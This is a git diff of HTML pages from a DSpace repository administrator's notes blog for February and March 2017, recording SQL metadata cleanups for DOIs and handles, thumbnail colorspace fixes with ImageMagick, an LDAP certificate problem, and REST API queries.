Looks like we&rsquo;ll be using cg.identifier.ccafsprojectpii as the field name
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -80,12 +80,12 @@ Looks like we&rsquo;ll be using cg.identifier.ccafsprojectpii as the field name
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -132,7 +132,7 @@ Looks like we&rsquo;ll be using cg.identifier.ccafsprojectpii as the field name
<time datetime="2017-02-07T07:04:52-08:00">Tue Feb 07, 2017</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -140,7 +140,7 @@ Looks like we&rsquo;ll be using cg.identifier.ccafsprojectpii as the field name
<ul>
<li>An item was mapped twice erroneously again, so I had to remove one of the mappings manually:</li>
</ul>
<pre><code>dspace=# select * from collection2item where item_id = '80278';
<pre tabindex="0"><code>dspace=# select * from collection2item where item_id = &#39;80278&#39;;
id | collection_id | item_id
-------+---------------+---------
92551 | 313 | 80278
@ -166,7 +166,7 @@ DELETE 1
<li>The climate risk management one doesn&rsquo;t exist, so I will have to ask Magdalena if they want me to add it to the input forms</li>
<li>Start testing some nearly 500 author corrections that CCAFS sent me:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/CCAFS-Authors-Feb-7.csv -f dc.contributor.author -t 'correct name' -m 3 -d dspace -u dspace -p fuuu
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/CCAFS-Authors-Feb-7.csv -f dc.contributor.author -t &#39;correct name&#39; -m 3 -d dspace -u dspace -p fuuu
</code></pre><h2 id="2017-02-09">2017-02-09</h2>
<ul>
<li>More work on CCAFS Phase II stuff</li>
@ -175,7 +175,7 @@ DELETE 1
<li>It&rsquo;s not a very good way to manage the registry, though, as removing one there doesn&rsquo;t cause it to be removed from the registry, and we always restore from database backups so there would never be a scenario when we needed these to be created</li>
<li>Testing some corrections on CCAFS Phase II flagships (<code>cg.subject.ccafs</code>):</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i ccafs-flagships-feb7.csv -f cg.subject.ccafs -t correct -m 210 -d dspace -u dspace -p fuuu
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i ccafs-flagships-feb7.csv -f cg.subject.ccafs -t correct -m 210 -d dspace -u dspace -p fuuu
</code></pre><h2 id="2017-02-10">2017-02-10</h2>
<ul>
<li>CCAFS said they want to wait on the flagship updates (<code>cg.subject.ccafs</code>) on CGSpace, perhaps for a month or so</li>
@ -215,61 +215,60 @@ DELETE 1
<li>Fix an issue with a duplicate declaration in the atmire-dspace-xmlui <code>pom.xml</code> (causing non-fatal warnings during the Maven build)</li>
<li>Experiment with making DSpace generate HTTPS handle links, first a change in dspace.cfg or the site&rsquo;s properties file:</li>
</ul>
<pre><code>handle.canonical.prefix = https://hdl.handle.net/
<pre tabindex="0"><code>handle.canonical.prefix = https://hdl.handle.net/
</code></pre><ul>
<li>And then a SQL command to update existing records:</li>
</ul>
<pre><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://hdl.handle.net', 'https://hdl.handle.net') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'uri');
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://hdl.handle.net&#39;, &#39;https://hdl.handle.net&#39;) where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;uri&#39;);
UPDATE 58193
</code></pre><ul>
<li>Seems to work fine!</li>
<li>I noticed a few items that have incorrect DOI links (<code>dc.identifier.doi</code>), and after looking in the database I see there are over 100 that are missing the scheme or are just plain wrong:</li>
</ul>
<pre><code>dspace=# select distinct text_value from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value not like 'http%://%';
<pre tabindex="0"><code>dspace=# select distinct text_value from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value not like &#39;http%://%&#39;;
</code></pre><ul>
<li>This will replace any that begin with <code>10.</code> and change them to <code>https://dx.doi.org/10.</code>:</li>
</ul>
<pre><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, '(^10\..+$)', 'https://dx.doi.org/\1') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like '10.%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;(^10\..+$)&#39;, &#39;https://dx.doi.org/\1&#39;) where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value like &#39;10.%&#39;;
</code></pre><ul>
<li>This will get any that begin with <code>doi:10.</code> and change them to <code>https://dx.doi.org/10.x</code>:</li>
</ul>
<pre><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, '^doi:(10\..+$)', 'https://dx.doi.org/\1') where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'doi:10%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;^doi:(10\..+$)&#39;, &#39;https://dx.doi.org/\1&#39;) where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value like &#39;doi:10%&#39;;
</code></pre><ul>
<li>Fix DOIs like <code>dx.doi.org/10.</code> to be <code>https://dx.doi.org/10.</code>:</li>
</ul>
<pre><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, '(^dx.doi.org/.+$)', 'https://dx.doi.org/\1') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'dx.doi.org/%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;(^dx.doi.org/.+$)&#39;, &#39;https://dx.doi.org/\1&#39;) where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value like &#39;dx.doi.org/%&#39;;
</code></pre><ul>
<li>Fix DOIs like <code>http//</code>:</li>
</ul>
<pre><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, '^http//(dx.doi.org/.+$)', 'https://dx.doi.org/\1') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'http//%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;^http//(dx.doi.org/.+$)&#39;, &#39;https://dx.doi.org/\1&#39;) where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value like &#39;http//%&#39;;
</code></pre><ul>
<li>Fix DOIs like <code>dx.doi.org./</code>:</li>
</ul>
<pre><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, '(^dx.doi.org\./.+$)', 'https://dx.doi.org/\1') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'dx.doi.org./%'
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;(^dx.doi.org\./.+$)&#39;, &#39;https://dx.doi.org/\1&#39;) where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value like &#39;dx.doi.org./%&#39;
</code></pre><ul>
<li>Delete some invalid DOIs:</li>
</ul>
<pre><code>dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value in ('DOI','CPWF Mekong','Bulawayo, Zimbabwe','bb');
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value in (&#39;DOI&#39;,&#39;CPWF Mekong&#39;,&#39;Bulawayo, Zimbabwe&#39;,&#39;bb&#39;);
</code></pre><ul>
<li>Fix some other random outliers:</li>
</ul>
<pre><code>dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.1016/j.aquaculture.2015.09.003' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'http:/dx.doi.org/10.1016/j.aquaculture.2015.09.003';
dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.5337/2016.200' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'doi: https://dx.doi.org/10.5337/2016.200';
dspace=# update metadatavalue set text_value = 'https://dx.doi.org/doi:10.1371/journal.pone.0062898' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'Http://dx.doi.org/doi:10.1371/journal.pone.0062898';
dspace=# update metadatavalue set text_value = 'https://dx.doi.10.1016/j.cosust.2013.11.012' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'http:dx.doi.10.1016/j.cosust.2013.11.012';
dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.1080/03632415.2014.883570' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'org/10.1080/03632415.2014.883570';
dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.15446/agron.colomb.v32n3.46052' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'Doi: 10.15446/agron.colomb.v32n3.46052';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = &#39;https://dx.doi.org/10.1016/j.aquaculture.2015.09.003&#39; where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value = &#39;http:/dx.doi.org/10.1016/j.aquaculture.2015.09.003&#39;;
dspace=# update metadatavalue set text_value = &#39;https://dx.doi.org/10.5337/2016.200&#39; where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value = &#39;doi: https://dx.doi.org/10.5337/2016.200&#39;;
dspace=# update metadatavalue set text_value = &#39;https://dx.doi.org/doi:10.1371/journal.pone.0062898&#39; where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value = &#39;Http://dx.doi.org/doi:10.1371/journal.pone.0062898&#39;;
dspace=# update metadatavalue set text_value = &#39;https://dx.doi.10.1016/j.cosust.2013.11.012&#39; where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value = &#39;http:dx.doi.10.1016/j.cosust.2013.11.012&#39;;
dspace=# update metadatavalue set text_value = &#39;https://dx.doi.org/10.1080/03632415.2014.883570&#39; where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value = &#39;org/10.1080/03632415.2014.883570&#39;;
dspace=# update metadatavalue set text_value = &#39;https://dx.doi.org/10.15446/agron.colomb.v32n3.46052&#39; where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value = &#39;Doi: 10.15446/agron.colomb.v32n3.46052&#39;;
</code></pre><ul>
<li>And do another round of <code>http://</code> → <code>https://</code> cleanups:</li>
</ul>
<pre><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://dx.doi.org', 'https://dx.doi.org') where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'http://dx.doi.org%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://dx.doi.org&#39;, &#39;https://dx.doi.org&#39;) where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;identifier&#39; and qualifier = &#39;doi&#39;) and text_value like &#39;http://dx.doi.org%&#39;;
</code></pre><ul>
<li>Run all DOI corrections on CGSpace</li>
<li>Something to think about here is to write a <a href="https://wiki.lyrasis.org/display/DSDOC5x/Curation+System#CurationSystem-ScriptedTasks">Curation Task</a> in Java to do these sanity checks / corrections every night</li>
<li>Then we could add a cron job for them and run them from the command line like:</li>
</ul>
<pre><code>[dspace]/bin/dspace curate -t noop -i 10568/79891
<pre tabindex="0"><code>[dspace]/bin/dspace curate -t noop -i 10568/79891
</code></pre><h2 id="2017-02-20">2017-02-20</h2>
<ul>
<li>Run all system updates on DSpace Test and reboot the server</li>
@ -280,12 +279,12 @@ dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.15446/agro
<li>Testing the <code>fix-metadata-values.py</code> script on macOS and it seems like we don&rsquo;t need to use <code>.encode('utf-8')</code> anymore when printing strings to the screen</li>
<li>It seems this might have only been a temporary problem, as both Python 3.5.2 and 3.6.0 are able to print the problematic string &ldquo;Entwicklung &amp; Ländlicher Raum&rdquo; without the <code>encode()</code> call, but print it as a <code>bytes</code> object when <code>encode()</code> <em>is</em> used:</li>
</ul>
<pre><code>$ python
<pre tabindex="0"><code>$ python
Python 3.6.0 (default, Dec 25 2016, 17:30:53)
&gt;&gt;&gt; print('Entwicklung &amp; Ländlicher Raum')
&gt;&gt;&gt; print(&#39;Entwicklung &amp; Ländlicher Raum&#39;)
Entwicklung &amp; Ländlicher Raum
&gt;&gt;&gt; print('Entwicklung &amp; Ländlicher Raum'.encode())
b'Entwicklung &amp; L\xc3\xa4ndlicher Raum'
&gt;&gt;&gt; print(&#39;Entwicklung &amp; Ländlicher Raum&#39;.encode())
b&#39;Entwicklung &amp; L\xc3\xa4ndlicher Raum&#39;
</code></pre><ul>
<li>So for now I will remove the encode call from the script (though it was never used on the versions on the Linux hosts), leading me to believe it really <em>was</em> a temporary problem, perhaps due to macOS or the Python build I was using.</li>
</ul>
@ -294,15 +293,15 @@ b'Entwicklung &amp; L\xc3\xa4ndlicher Raum'
<li>Testing regenerating PDF thumbnails, like I started in 2016-11</li>
<li>It seems there is a bug in <code>filter-media</code> that causes it to process formats that aren&rsquo;t part of its configuration:</li>
</ul>
<pre><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16856 -p &quot;ImageMagick PDF Thumbnail&quot;
<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16856 -p &#34;ImageMagick PDF Thumbnail&#34;
File: earlywinproposal_esa_postharvest.pdf.jpg
FILTERED: bitstream 13787 (item: 10568/16881) and created 'earlywinproposal_esa_postharvest.pdf.jpg'
FILTERED: bitstream 13787 (item: 10568/16881) and created &#39;earlywinproposal_esa_postharvest.pdf.jpg&#39;
File: postHarvest.jpg.jpg
FILTERED: bitstream 16524 (item: 10568/24655) and created 'postHarvest.jpg.jpg'
FILTERED: bitstream 16524 (item: 10568/24655) and created &#39;postHarvest.jpg.jpg&#39;
</code></pre><ul>
<li>According to <code>dspace.cfg</code> the ImageMagick PDF Thumbnail plugin should only process PDFs:</li>
</ul>
<pre><code>filter.org.dspace.app.mediafilter.ImageMagickImageThumbnailFilter.inputFormats = BMP, GIF, image/png, JPG, TIFF, JPEG, JPEG 2000
<pre tabindex="0"><code>filter.org.dspace.app.mediafilter.ImageMagickImageThumbnailFilter.inputFormats = BMP, GIF, image/png, JPG, TIFF, JPEG, JPEG 2000
filter.org.dspace.app.mediafilter.ImageMagickPdfThumbnailFilter.inputFormats = Adobe PDF
</code></pre><ul>
<li>I&rsquo;ve sent a message to the mailing list and might file a Jira issue</li>
@ -317,8 +316,8 @@ filter.org.dspace.app.mediafilter.ImageMagickPdfThumbnailFilter.inputFormats = A
<ul>
<li>Find all fields with &ldquo;<a href="http://hdl.handle.net">http://hdl.handle.net</a>&rdquo; values (most are in <code>dc.identifier.uri</code>, but some are in other URL-related fields like <code>cg.link.reference</code>, <code>cg.identifier.dataurl</code>, and <code>cg.identifier.url</code>):</li>
</ul>
<pre><code>dspace=# select distinct metadata_field_id from metadatavalue where resource_type_id=2 and text_value like 'http://hdl.handle.net%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://hdl.handle.net', 'https://hdl.handle.net') where resource_type_id=2 and metadata_field_id IN (25, 113, 179, 219, 220, 223) and text_value like 'http://hdl.handle.net%';
<pre tabindex="0"><code>dspace=# select distinct metadata_field_id from metadatavalue where resource_type_id=2 and text_value like &#39;http://hdl.handle.net%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://hdl.handle.net&#39;, &#39;https://hdl.handle.net&#39;) where resource_type_id=2 and metadata_field_id IN (25, 113, 179, 219, 220, 223) and text_value like &#39;http://hdl.handle.net%&#39;;
UPDATE 58633
</code></pre><ul>
<li>This works but I&rsquo;m thinking I&rsquo;ll wait on the replacement as there are perhaps some other places that rely on <code>http://hdl.handle.net</code> (grep the code, it&rsquo;s scary how many things are hard coded)</li>
@ -328,7 +327,7 @@ UPDATE 58633
<ul>
<li>LDAP users cannot log in today, looks to be an issue with CGIAR&rsquo;s LDAP server:</li>
</ul>
<pre><code>$ openssl s_client -connect svcgroot2.cgiarad.org:3269
<pre tabindex="0"><code>$ openssl s_client -connect svcgroot2.cgiarad.org:3269
CONNECTED(00000003)
depth=0 CN = SVCGROOT2.CGIARAD.ORG
verify error:num=20:unable to get local issuer certificate
@ -345,7 +344,7 @@ Certificate chain
<li>For some reason it is now signed by a private certificate authority</li>
<li>This error seems to have started on 2017-02-25:</li>
</ul>
<pre><code>$ grep -c &quot;unable to find valid certification path&quot; [dspace]/log/dspace.log.2017-02-*
<pre tabindex="0"><code>$ grep -c &#34;unable to find valid certification path&#34; [dspace]/log/dspace.log.2017-02-*
[dspace]/log/dspace.log.2017-02-01:0
[dspace]/log/dspace.log.2017-02-02:0
[dspace]/log/dspace.log.2017-02-03:0
@ -381,7 +380,7 @@ Certificate chain
<li>The problem likely lies in the logic of <code>ImageMagickThumbnailFilter.java</code>, as <code>ImageMagickPdfThumbnailFilter.java</code> extends it</li>
<li>Run CIAT corrections on CGSpace</li>
</ul>
<pre><code>dspace=# update metadatavalue set authority='3026b1de-9302-4f3e-85ab-ef48da024eb2', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value = 'International Center for Tropical Agriculture';
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;3026b1de-9302-4f3e-85ab-ef48da024eb2&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value = &#39;International Center for Tropical Agriculture&#39;;
</code></pre><ul>
<li>CGNET has fixed the certificate chain on their LDAP server</li>
<li>Redeploy CGSpace and DSpace Test on the latest <code>5_x-prod</code> branch with fixes for LDAP bind user</li>
@ -393,16 +392,16 @@ Certificate chain
<li>Ah, this is probably because some items have the <code>International Center for Tropical Agriculture</code> author twice, which I first noticed in 2016-12 but couldn&rsquo;t figure out how to fix</li>
<li>I think I can do it by first exporting all metadatavalues that have the author <code>International Center for Tropical Agriculture</code></li>
</ul>
<pre><code>dspace=# \copy (select resource_id, metadata_value_id from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='International Center for Tropical Agriculture') to /tmp/ciat.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select resource_id, metadata_value_id from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value=&#39;International Center for Tropical Agriculture&#39;) to /tmp/ciat.csv with csv;
COPY 1968
</code></pre><ul>
<li>And then use awk to print the duplicate lines to a separate file:</li>
</ul>
<pre><code>$ awk -F',' 'seen[$1]++' /tmp/ciat.csv &gt; /tmp/ciat-dupes.csv
<pre tabindex="0"><code>$ awk -F&#39;,&#39; &#39;seen[$1]++&#39; /tmp/ciat.csv &gt; /tmp/ciat-dupes.csv
</code></pre><ul>
<li>From that file I can create a list of 279 deletes and put them in a batch script like:</li>
</ul>
<pre><code>delete from metadatavalue where resource_type_id=2 and metadata_field_id=3 and metadata_value_id=2742061;
<pre tabindex="0"><code>delete from metadatavalue where resource_type_id=2 and metadata_field_id=3 and metadata_value_id=2742061;
</code></pre>
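<ul>
<li>A one-liner like this could generate that batch script from the dupes file (a sketch; the output filename is illustrative, and <code>$2</code> is the <code>metadata_value_id</code> column from the export above):</li>
</ul>
<pre tabindex="0"><code>$ awk -F&#39;,&#39; &#39;{print &#34;delete from metadatavalue where resource_type_id=2 and metadata_field_id=3 and metadata_value_id=&#34; $2 &#34;;&#34;}&#39; /tmp/ciat-dupes.csv &gt; /tmp/ciat-deletes.sql
</code></pre>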
@ -424,15 +423,15 @@ COPY 1968
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -54,7 +54,7 @@ Interestingly, it seems DSpace 4.x&rsquo;s thumbnails were sRGB, but forcing reg
$ identify ~/Desktop/alc_contrastes_desafios.jpg
/Users/aorth/Desktop/alc_contrastes_desafios.jpg JPEG 464x600 464x600&#43;0&#43;0 8-bit CMYK 168KB 0.000u 0:00.000
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -84,12 +84,12 @@ $ identify ~/Desktop/alc_contrastes_desafios.jpg
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -136,7 +136,7 @@ $ identify ~/Desktop/alc_contrastes_desafios.jpg
<time datetime="2017-03-01T17:08:52+02:00">Wed Mar 01, 2017</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -156,7 +156,7 @@ $ identify ~/Desktop/alc_contrastes_desafios.jpg
<li>Discovered that the ImageMagic <code>filter-media</code> plugin creates JPG thumbnails with the CMYK colorspace when the source PDF is using CMYK</li>
<li>Interestingly, it seems DSpace 4.x&rsquo;s thumbnails were sRGB, but forcing regeneration using DSpace 5.x&rsquo;s ImageMagick plugin creates CMYK JPGs if the source PDF was CMYK (see <a href="https://cgspace.cgiar.org/handle/10568/51999">10568/51999</a>):</li>
</ul>
<pre><code>$ identify ~/Desktop/alc_contrastes_desafios.jpg
<pre tabindex="0"><code>$ identify ~/Desktop/alc_contrastes_desafios.jpg
/Users/aorth/Desktop/alc_contrastes_desafios.jpg JPEG 464x600 464x600+0+0 8-bit CMYK 168KB 0.000u 0:00.000
</code></pre><ul>
<li>This results in discolored thumbnails when compared to the original PDF, for example sRGB and CMYK:</li>
@ -171,7 +171,7 @@ $ identify ~/Desktop/alc_contrastes_desafios.jpg
<li>I created a patch for DS-3517 and made a pull request against upstream <code>dspace-5_x</code>: <a href="https://github.com/DSpace/DSpace/pull/1669">https://github.com/DSpace/DSpace/pull/1669</a></li>
<li>Looks like <code>-colorspace sRGB</code> alone isn&rsquo;t enough, we need to use profiles:</li>
</ul>
<pre><code>$ convert alc_contrastes_desafios.pdf\[0\] -profile /opt/brew/Cellar/ghostscript/9.20/share/ghostscript/9.20/iccprofiles/default_cmyk.icc -thumbnail 300x300 -flatten -profile /opt/brew/Cellar/ghostscript/9.20/share/ghostscript/9.20/iccprofiles/default_rgb.icc alc_contrastes_desafios.pdf.jpg
<pre tabindex="0"><code>$ convert alc_contrastes_desafios.pdf\[0\] -profile /opt/brew/Cellar/ghostscript/9.20/share/ghostscript/9.20/iccprofiles/default_cmyk.icc -thumbnail 300x300 -flatten -profile /opt/brew/Cellar/ghostscript/9.20/share/ghostscript/9.20/iccprofiles/default_rgb.icc alc_contrastes_desafios.pdf.jpg
</code></pre><ul>
<li>This reads the input file, applies the CMYK profile, applies the RGB profile, then writes the file</li>
<li>Note that you should set the first profile immediately after the input file</li>
@ -180,9 +180,9 @@ $ identify ~/Desktop/alc_contrastes_desafios.jpg
<li>Somehow we need to detect the color system being used by the input file and handle each case differently (with profiles)</li>
<li>This is trivial with <code>identify</code> (even by the <a href="http://im4java.sourceforge.net/api/org/im4java/core/IMOps.html#identify">Java ImageMagick API</a>):</li>
</ul>
<pre><code>$ identify -format '%r\n' alc_contrastes_desafios.pdf\[0\]
<pre tabindex="0"><code>$ identify -format &#39;%r\n&#39; alc_contrastes_desafios.pdf\[0\]
DirectClass CMYK
$ identify -format '%r\n' Africa\ group\ of\ negotiators.pdf\[0\]
$ identify -format &#39;%r\n&#39; Africa\ group\ of\ negotiators.pdf\[0\]
DirectClass sRGB Alpha
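# a sketch of branching on the colorspace in a wrapper script (not the actual filter logic);
# %[colorspace] prints just the colorspace name, e.g. CMYK or sRGB:
$ [ &#34;$(identify -format &#39;%[colorspace]&#39; alc_contrastes_desafios.pdf\[0\])&#34; = &#34;CMYK&#34; ] &amp;&amp; echo &#34;apply CMYK and sRGB profiles&#34;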
</code></pre><h2 id="2017-03-04">2017-03-04</h2>
<ul>
@ -196,7 +196,7 @@ DirectClass sRGB Alpha
<li>They want something like the items that are returned by the general &ldquo;LAND&rdquo; query in the search interface, but we cannot do that</li>
<li>We can only return specific results for metadata fields, like:</li>
</ul>
<pre><code>$ curl -s -H &quot;accept: application/json&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;: &quot;cg.subject.ilri&quot;,&quot;value&quot;: &quot;LAND REFORM&quot;, &quot;language&quot;: null}' | json_pp
<pre tabindex="0"><code>$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.subject.ilri&#34;,&#34;value&#34;: &#34;LAND REFORM&#34;, &#34;language&#34;: null}&#39; | json_pp
</code></pre><ul>
<li>But there are hundreds of combinations of fields and values (like <code>dc.subject</code> and all the center subjects), and we can&rsquo;t use wildcards in REST!</li>
<li>Reading about enabling multiple handle prefixes in DSpace</li>
@ -204,7 +204,7 @@ DirectClass sRGB Alpha
